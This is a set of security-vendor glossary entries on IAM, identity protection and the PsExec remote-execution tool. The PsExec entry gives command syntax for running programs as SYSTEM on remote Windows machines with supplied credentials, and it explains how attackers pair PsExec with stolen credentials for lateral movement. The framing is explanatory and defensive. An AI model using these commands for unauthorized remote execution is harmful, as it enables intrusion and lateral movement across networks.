Its primary objective is to ensure that each user or entity has a well-defined and unique digital identity within the organization's IAM system. IDM provides a foundation for access control and establishes the basis for managing user privileges and permissions. Access Management, on the other hand, is concerned with controlling and managing the access permissions and privileges associated with an individual's or entity's digital identity. AM focuses on enforcing authentication and authorization processes to ensure that users have the appropriate level of access to specific resources or perform certain actions within the system. Authentication verifies the claimed identity of the user, while authorization determines what resources the user can access and what actions they can perform. AM includes activities such as access control policies, role-based access control (RBAC), and enforcing least privilege principles. To illustrate the relationship between IDM and AM, consider a scenario where a new employee joins an organization. Identity Management would handle the creation of a digital identity for the employee, assigning a unique username and initial set of credentials. Access Management would then come into play by determining the employee's access rights based on their role and responsibilities within the organization. AM would enforce authentication mechanisms and access control policies to ensure that the employee can access the appropriate resources required to perform their job duties while adhering to the principle of least privilege. Cloud Versus On-Premises IAM As organizations evaluate their Identity and Access Management (IAM) options, one important consideration is whether to adopt a cloud-based IAM solution or stick with an on-premises IAM implementation. Both approaches have their merits and considerations. AspectCloud IAMOn-Premises IAMScalability and FlexibilityEasily scalable, flexible provisioningLimited by on-premises infrastructureRapid DeploymentQuick deployment of pre-built IAM servicesRequires infrastructure setup and configurationCost EfficiencyPay-as-you-go model, no upfront costsUpfront costs for infrastructure and licensingVendor ManagementReliance on CSP for infrastructure managementFull control over infrastructure managementInnovation and UpdatesRegular updates and new features from CSPControlled updates and customization optionsControl and CustomizationLimited customization optionsFull control over customization and policiesData SovereigntyData stored on CSP's infrastructureComplete control over data within the premisesLegacy System IntegrationMay have limitations with legacy systemsBetter compatibility with on-premises systemsSecurity ControlCSP-managed security measuresDirect control over security measuresCompliance ConsiderationsCompliance with CSP's certificationsEnhanced control and visibility for compliance It's important to note that both Cloud IAM and On-Premises IAM have their own security considerations, such as data privacy, network connectivity, and authentication mechanisms. Organizations should evaluate their specific needs, risk appetite, budget, and regulatory requirements when deciding between Cloud IAM and On-Premises IAM. Hybrid IAM solutions that combine both cloud and on-premises components may also be viable options to meet specific organizational needs. Benefits of implementing IAM in your organization... --- - Published: 2023-01-17 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-protection/ Measures and proactive monitoring aimed at safeguarding individuals’ personal data and accounts from theft, fraud, or unauthorized use. Identity protection refers to safeguarding one's personal information and identity from theft or fraud. It involves proactively monitoring for signs of identity theft as well as taking measures to minimize risks. As cyber threats continue to pose a danger to both businesses and individuals, identity protection has become an increasingly critical component of cybersecurity strategies. Protecting personally identifiable information and accounts from unauthorized access is essential in today's digital world. For professionals tasked with safeguarding sensitive data and systems, developing a comprehensive identity protection plan is key. Why Is Identity Protection Important? Protecting one's identity has become increasingly important in today's digital world. Identity theft and fraud are serious cybercrimes that can have devastating financial and emotional consequences on victims. Organizations also need to prioritize identity protection to safeguard sensitive customer data and maintain trust. There are several reasons why identity protection is crucial: Financial loss. Identity thieves steal personal information like Social Security numbers, bank account numbers, and credit card numbers to open fraudulent accounts and make unauthorized purchases in the victim's name. This can lead to substantial financial loss and damage credit scores. Privacy concerns. Once personal data has been compromised, it can be difficult to contain and recover. Criminals may use the information for malicious purposes like stalking, harassment, or blackmail. They can also sell sensitive data on the dark web. Reputational harm. If an organization experiences a data breach, it can seriously damage customer trust and loyalty. The organization may face legal consequences and loss of business as well. Strict identity protection policies and controls must be in place to mitigate these risks. Security risks. Poor identity protection practices pose a threat to both individuals and organizations. Identifying and addressing vulnerabilities in systems and processes is key to reducing risks like hacking, malware infections, and insider threats. Continuous monitoring and testing is required. Identity Protection vs Identity Security In the realm of cybersecurity, "Identity Protection" focuses on safeguarding personal identity information from unauthorized access and misuse. It encompasses measures like monitoring personal data, alerting users to potential fraud, and providing recovery services in case of identity theft. Essentially, it aims to detect and mitigate the damage from identity-related fraud by employing tools such as credit monitoring, fraud alerts, and identity theft insurance. On the other hand, "Identity Security" deals with managing and securing digital identities to ensure that access to resources is correctly granted. This broader approach involves implementing technologies such as Identity and Access Management (IAM) systems, Multi-Factor Authentication (MFA), Single Sign-On (SSO), and Role-Based Access Control (RBAC). These tools help manage user roles and access privileges, securing access to systems and data, and protecting them against unauthorized use. Common Types of Identity Theft Phishing Phishing refers to fraudulent emails, texts, or phone calls that appear legitimate but are designed to steal sensitive data like account numbers, passwords, or Social Security numbers. Phishing messages often pose as a trustworthy company or website to trick recipients into clicking malicious links, downloading infected attachments, or providing private information. Identity Theft Identity theft occurs when someone steals your personal information like your full name, Social Security number, date of birth, and address to impersonate you for financial gain. Thieves may use your identity to open new accounts, file for loans, commit tax fraud, or access your existing accounts. Identity theft can damage your credit and finances if not detected early. Monitor accounts regularly for unauthorized activity and check your credit report annually. Account Takeover An account takeover happens when cybercriminals gain access to your online accounts like email, social media, or banking. Criminals obtain account access through phishing, malware, or by purchasing stolen login credentials on the dark web. Once inside an account, thieves can lock you out, send spam, steal data, commit fraud, or hold accounts for ransom. Use strong, unique passwords for accounts and two-factor authentication when available to help prevent account takeovers. Malicious Remote Connection This form of cyber attack involves unauthorized remote access to a corporate network. Attackers may exploit vulnerabilities in remote access systems like Virtual Private Networks (VPNs) or Zero Trust Network Access (ZTNA) to gain entry. Once inside the network, they can access sensitive corporate data, deploy malware, or conduct espionage. This type of breach is particularly dangerous because it allows attackers to operate within a network as if they were legitimate users. It’s crucial for organizations to secure remote access systems with strong authentication measures and continuous monitoring for unusual activities. Lateral Movement Threat actor follows up on an initial endpoint compromise by accessing additional workstations and servers with compromised domain credentials. Another flavor lateral movement is to extract from the compromised endpoints credentials for SaaS apps or cloud workloads and pivot from the initial on-prem foothold to the cloud environment. Credit Card Fraud Credit card fraud refers to the unauthorized use of your credit card information to make purchases. Criminals obtain card numbers through skimmers at payment terminals, hacking online retailers, or buying stolen cards on cybercrime forums. Fraudsters then use the card information to shop online or create physical counterfeit cards. Regularly monitor statements for unauthorized charges and report any fraud immediately to limit liability and prevent further misuse of your accounts. Warning Signs Your Identity Has Been Stolen Once a person's identity has been stolen, there are several warning signs that may alert the victim. Recognizing these signs quickly can help limit the damage. Suspicious Activity in Financial Accounts Unauthorized transactions, new accounts opened in one's name, and sudden changes in account balances can indicate identity theft. Criminals may use stolen personal information to access existing accounts or open new lines of credit. Regularly monitoring financial statements and account activity is crucial. Bills or Collection Notices for Unknown Debt Receiving bills, collection notices or calls about unknown charges, accounts or loans is a major red flag. Identity thieves will sometimes open accounts or file for loans in the victim's name and default on payments. Checking one's credit report regularly helps detect fraudulent accounts or charges before they damage one's credit. Denied Credit for No Apparent Reason If credit applications are suddenly denied when one's credit was previously in good standing, it may indicate identity theft. Thieves may have accessed accounts, defaulted on payments or committed other credit fraud that lowers the victim's credit score. Obtaining a free credit report allows one to check for errors or unauthorized activity. Tax Return Rejected Having one's tax return rejected by the IRS due to a return already filed under one's Social Security number is a sign that an identity thief may have used that information to commit tax fraud or claim a fraudulent refund. Filing a police report and contacting the IRS immediately can help resolve the issue and prevent further fraud. Unfamiliar Mail Receiving pre-approved credit offers, bills, or other mail for unknown accounts or in one's name at an unfamiliar address may indicate identity theft. Criminals will sometimes use stolen personal information to open accounts or file a change of address to divert the victim's mail. Reporting such suspicious mail or a false change of address to the USPS and checking one's credit report are important steps to take. By staying vigilant for these common warning signs, individuals and businesses can detect identity theft early and take action to limit negative consequences. Monitoring accounts and reports regularly, filing reports with the relevant agencies, and considering identity theft protection services are some of the most effective methods for identifying and addressing identity fraud. Best Practices for Identity Protection To properly protect one's identity, several best practices should be followed. These precautions help safeguard sensitive personal information and reduce the risks of identity theft. Monitor Accounts and Credit Reports Regularly It is recommended that individuals check bank statements, credit card statements, and credit reports regularly for any unauthorized activity. Early detection of fraud is critical to limiting damage. Credit reports from the three major credit bureaus should be checked at least once a year for inaccuracies or signs of fraud. Use Strong and Unique Passwords Creating strong, complex passwords that are different for each account is one of the best ways to protect online identities. Passwords should be at least 8-12 characters and contain a mix of letters, numbers and symbols. Using a password manager tool can help generate and remember complex unique passwords for all accounts. Enable Two-Factor Authentication When Available Two-factor authentication, or 2FA, adds an extra layer of security for online accounts. It requires not only a password but also another piece of information like a security code sent to your phone. 2FA helps prevent unauthorized access even if account credentials are compromised. It should be enabled for email, banking, social media, and any other accounts that offer it. Be Cautious of Phishing and Malware Phishing emails and malicious software are common ways for cybercriminals to steal personal data and financial information. Individuals should be wary of unsolicited requests for sensitive data or account information. Links and downloads from unknown or untrusted sources should also be avoided. Security software should be used to help detect and block malware. Monitor Mailing and Bills Regularly Undelivered or missing mail could indicate that an identity thief has created accounts or submitted change of address forms to redirect information. Individuals should watch for bills, statements and other correspondence that do not arrive as expected. This could alert you early to identity theft, giving you time to take action to limit the damage. Be Careful with Tax Returns and Refunds Fraudsters frequently target tax returns and refunds. File tax returns as early as possible to avoid having an identity thief file a fake return to claim your refund. Monitor IRS and state tax board accounts for any signs of fraud. Be cautious of unsolicited communications claiming tax issues that require immediate action or payment. Legitimate agencies will not request sensitive data via phone, email or text. Essential Identity Protection Strategies To properly protect one's identity, several essential strategies should be employed. These include monitoring accounts and credit reports regularly, using strong and unique passwords, enabling two-factor authentication whenever possible, and being cautious of phishing emails and malicious links. Monitor Accounts and Credit Reports It is critical to routinely check financial accounts, credit reports, and credit scores for any unauthorized activity. Experts recommend monitoring accounts and credit reports at least once a month, and checking credit scores every few months. Some services offer free credit reports, credit scores, and credit monitoring. Identity theft often goes undetected for some time, so consistent monitoring is key. Use Strong, Unique Passwords Passwords are the first line of defense for online accounts. Reusing the same password across sites puts individuals at major risk. Strong, unique passwords should be used for all accounts. A password manager can help generate and remember complex, unique passwords. Enable two-factor authentication on accounts whenever available for an extra layer of security. Enable Two-Factor Authentication Two-factor authentication, also known as 2FA, adds an additional layer of security for online accounts. It requires not only a password but also another piece of information like a security code sent to one's phone. Enable 2FA on all accounts that offer it, including email, banking, social media, and any other online services. SMS text messages, authentication apps, and security keys are all options for receiving 2FA codes. Be Cautious of Phishing and Malware Phishing emails and malicious websites are common ways for cybercriminals to steal personal information or install malware. Be wary of unsolicited requests for sensitive data or account information. Never click links or download attachments from unknown or untrusted sources. Phishing emails are often designed to appear legitimate but contain links to malicious sites. Staying vigilant and cautious can help prevent identity theft and account takeovers. Following these essential strategies consistently and diligently can significantly reduce the risks of identity theft and account compromise. While no approach is 100% foolproof, monitoring accounts and credit reports regularly, using strong unique passwords, enabling two-factor authentication, and being cautious of phishing and malware can help individuals maintain a... --- - Published: 2023-01-17 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/psexec/ A Windows command-line tool used for executing processes on remote systems, commonly leveraged by attackers for lateral movement and remote code execution in network breaches. PsExec is a command-line tool that allows users to run programs on remote systems. It can be used to execute remote commands, scripts, and applications on remote systems, as well as to launch GUI-based applications on remote systems. PsExec uses the Microsoft Windows Service Control Manager (SCM) to start an instance of the service on the remote system, which allows the tool to run the specified command or application with the account’s privileges of the service account on the remote system. In order to establish the connection, the remote user should have access privileges to the target machine and provide the name of the target machine, as well as his username and password in the following format: PsExec -s \\MACHINE-NAME -u USERNAME -p PASSWORD COMMAND (the process to be executed following establishing the connection). What is PsExec used for? PsExec is a powerful command-line tool used primarily for remote administration and execution of processes on Windows systems. It allows system administrators and security professionals to execute commands or run programs on remote computers in a networked environment. Here are some common use cases for PsExec: Remote System Administration: PsExec enables administrators to remotely manage and administer multiple Windows systems without the need for physical access. It allows them to execute commands, run scripts, install software, modify system configurations, and perform various administrative tasks on remote machines from a central location. Software Deployment and Updates: With PsExec, administrators can remotely deploy software packages, patches, or updates across multiple computers simultaneously. This feature is particularly useful in large-scale environments where manual installation on individual systems would be time-consuming and impractical. Troubleshooting and Diagnostics: PsExec can be used to remotely diagnose and troubleshoot system issues. Administrators can execute diagnostic tools, access event logs, retrieve system information, or run troubleshooting scripts on remote systems to identify and resolve problems without being physically present. Security Auditing and Patch Management: Security professionals often employ PsExec to conduct security audits, vulnerability assessments, or penetration testing exercises. It allows them to remotely execute security scanning tools, verify patch levels, and assess the security posture of remote systems within the network. Incident Response and Forensics: During incident response investigations, PsExec aids in remotely accessing compromised systems for analysis and evidence gathering. It allows security analysts to execute commands or run forensics tools on compromised machines without directly interacting with them, minimizing the risk of further compromise or data loss. Red Teaming and Lateral Movement: In red teaming exercises, where organizations simulate real-world attacks to test their security defenses, PsExec is often used for lateral movement within the network. Attackers can use PsExec to execute commands or run malicious payloads on compromised systems, moving laterally and escalating privileges to gain unauthorized access to sensitive resources. Automation and Scripting: PsExec can be integrated into scripts or batch files, enabling automation of repetitive tasks across multiple systems. It provides a means to execute scripts remotely, allowing administrators to orchestrate complex operations or perform regular maintenance tasks efficiently. However, it’s important to note that PsExec can be a powerful tool in the hands of attackers as well, since it allows them to execute arbitrary code on remote systems, potentially leading to privilege escalation and lateral movement in the network. Therefore, it is important to use PsExec securely and to limit the use of PsExec to trusted users and systems. How to Install and Set Up PsExec Installing and setting up PsExec is a straightforward process that involves the following steps: Downloading PsExec To install PsExec, you can visit the official Microsoft website or trusted software repositories to download the PsExec executable file. Ensure that you download it from a reliable source to avoid any security risks or malware. Installing PsExec PsExec does not require a formal installation process. Once you have downloaded the PsExec executable file, you can save it to a directory of your choice on your local system. It is recommended to place it in a location that is easily accessible and included in the system's PATH environment variable for convenient usage. Running PsExec and Connecting to a Remote Computer To connect to a remote computer using PsExec, follow these steps: a. Open a command prompt or terminal on your local system. b. Navigate to the directory where you saved the PsExec executable file. c. To establish a connection with a remote computer, use the following command: psexec \\remote_computer_name_or_IP -u username -p password command Replace "remote_computer_name_or_IP" with the name or IP address of the remote computer you want to connect to. Replace "username" and "password" with the credentials of an account on the remote computer that has the necessary permissions for the desired operations. Specify the command you want to execute on the remote computer. d. Press Enter to execute the command. PsExec will establish a connection with the remote computer, authenticate using the provided credentials, and execute the specified command remotely. e. You will see the output of the executed command in your local command prompt or terminal window. It's important to note that the successful connection and execution of commands using PsExec depend on the network connectivity between your local system and the remote computer, as well as the correct authentication credentials and permissions on the remote system. What are the most common PsExec commands? PsExec offers several commonly used commands that provide administrators with powerful remote execution capabilities. Here are some of the most common PsExec commands and their functions: PsExec \remote_computer command: Executes the specified command on the remote computer. Enables administrators to run commands or launch programs remotely. PsExec \remote_computer -s command: Executes the specified command with system-level privileges on the remote computer. Useful for running commands that require elevated privileges or accessing system resources. PsExec \remote_computer -u username -p password command: Executes the specified command on the remote computer using the provided username and password for authentication. Allows administrators to run commands with specific user credentials on remote systems. PsExec \remote_computer -c -f -s -d command: Copies the specified executable file to the remote computer, executes it with system-level privileges, in the background, and without waiting for its completion. Useful for deploying and running programs on remote systems without user interaction. PsExec \remote_computer -i session_id -d -s command: Executes the specified command in an interactive session with system-level privileges on the remote computer. Helpful for running commands that require interaction or accessing the graphical user interface of the remote system. PsExec \remote_computer -accepteula -s -c -f script. bat: Copies the specified script file to the remote computer, executes it with system-level privileges, and waits for its completion. Allows administrators to remotely execute scripts for automation or administrative tasks. These commands represent a subset of the available PsExec commands, each serving a specific purpose in remote administration and execution. The syntax for PsExec commands is: psexec \computer command psexec @run_file command PsExec command line options: OptionExplanation\computerThe remote computer to connect to. Use \* for all computers in domain. @run_fileRun command against computers listed in specified text file. commandProgram to execute on the remote system. argumentsArguments to pass to remote program. Use absolute paths. -aSet CPU affinity. Comma separate CPU numbers starting at 1. -cCopy local program to remote system before executing. -fForce copy over existing remote file. -vOnly copy if local program is newer version than remote. -dDon't wait for remote program to finish. -eDon't load user profile. -iInteract with remote desktop. -lRun with limited user rights (Users group). -nConnection timeout in seconds. -pSpecify password for user. -rName of remote service to interact with. -sRun under SYSTEM account. -uSpecify username for login. -wSet working directory on remote system. -xDisplay UI on Winlogon desktop. -lowRun at low priority. -accepteulaSuppress EULA dialog. Is PsExec a PowerShell? PsExec is not a PowerShell. It is a command-line tool that allows users to run programs on remote systems. PowerShell, on the other hand, is a task automation and configuration management framework developed by Microsoft, which includes a command-line shell and associated scripting language built on the . NET framework. PowerShell can be used to automate various tasks and perform complex operations on local or remote systems. While both PsExec and PowerShell can be used to perform similar tasks, such as running commands on remote systems, they are different tools and have different capabilities. PsExec is designed to execute a single command or application on a remote system, while PowerShell is a more powerful framework that can be used to automate and manage various tasks, including running commands and scripts on remote systems. Therefore, depending on the scenario, one tool may be more appropriate than the other. How PsExec Works PsExec works by leveraging its unique architecture and communication protocols to enable remote execution on Windows systems. Let's explore the key aspects of how PsExec operates: Architecture and Communication PsExec follows a client-server architecture. The client-side component, executed on the local system, establishes a connection with the server-side component running on the remote system. This connection enables the transmission of commands and data between the two systems. PsExec uses the Server Message Block (SMB) protocol, specifically the SMB file sharing and named pipe mechanisms, to establish communication channels with remote systems. This allows for secure and reliable communication between the client and server components. Authentication and Security PsExec employs authentication mechanisms to ensure secure access to remote systems. It supports various authentication methods, including using a username and password, or authentication via NTLM (NT LAN Manager) or Kerberos. To enhance security, it is crucial to follow best practices for authentication when using PsExec. These practices include utilizing strong and unique passwords, implementing multi-factor authentication where possible, and adhering to the principle of least privilege by granting only necessary permissions to PsExec users. File and Registry Access PsExec facilitates file and registry access on remote systems, allowing administrators to perform tasks such as copying files, executing scripts, or modifying registry settings. When executing commands remotely, PsExec temporarily copies the required executable or script to the remote system's temporary directory before execution. It's important to consider potential security considerations when using PsExec for file and registry operations. For example, administrators should exercise caution when transferring sensitive files and ensure that appropriate access controls are in place to prevent unauthorized access or modification of critical system files and registry entries. Is PsExec malware? PsExec is not malware itself, but it can be used by malware and attackers to perform malicious actions. PsExec is a legitimate tool that allows users to run programs on remote systems. It can be used for a variety of legitimate tasks such as troubleshooting, deploying software updates and patches, and executing commands and scripts on multiple systems simultaneously. However, PsExec can also be used by attackers to gain unauthorized access to remote systems and perform malicious actions. For example, an attacker could use PsExec to execute a malicious payload on a remote system, or to move laterally within a network and gain access to sensitive information. Therefore, it’s important to use PsExec securely and to limit the use of PsExec to trusted users and systems. How is PsExec Used in Cyberattacks? The seamless remote access PsExec enables from a source machine to a target machine is intensively abused by threat actors in the course of the lateral movement stage in cyberattacks. This would typically occur after the initial compromise of a patient-zero machine.   From that point onward, attackers seek to expand their presence within the environment and reach either domain dominance or specific data they are after. PsExec provides them with a seamless and reliable way to achieve that for the following reasons. How can adversaries use PsExec together with compromised credentials? By combining compromised user credentials with PsExec, adversaries can bypass authentication mechanisms, gain access to multiple systems, and potentially compromise a significant portion of the network. This approach enables them to move laterally, escalate privileges, and carry out their malicious objectives with a broader impact. What makes PsExec a tool of choice for lateral movement attacks? PsExec is often considered a "living off the land" tool of choice... --- ---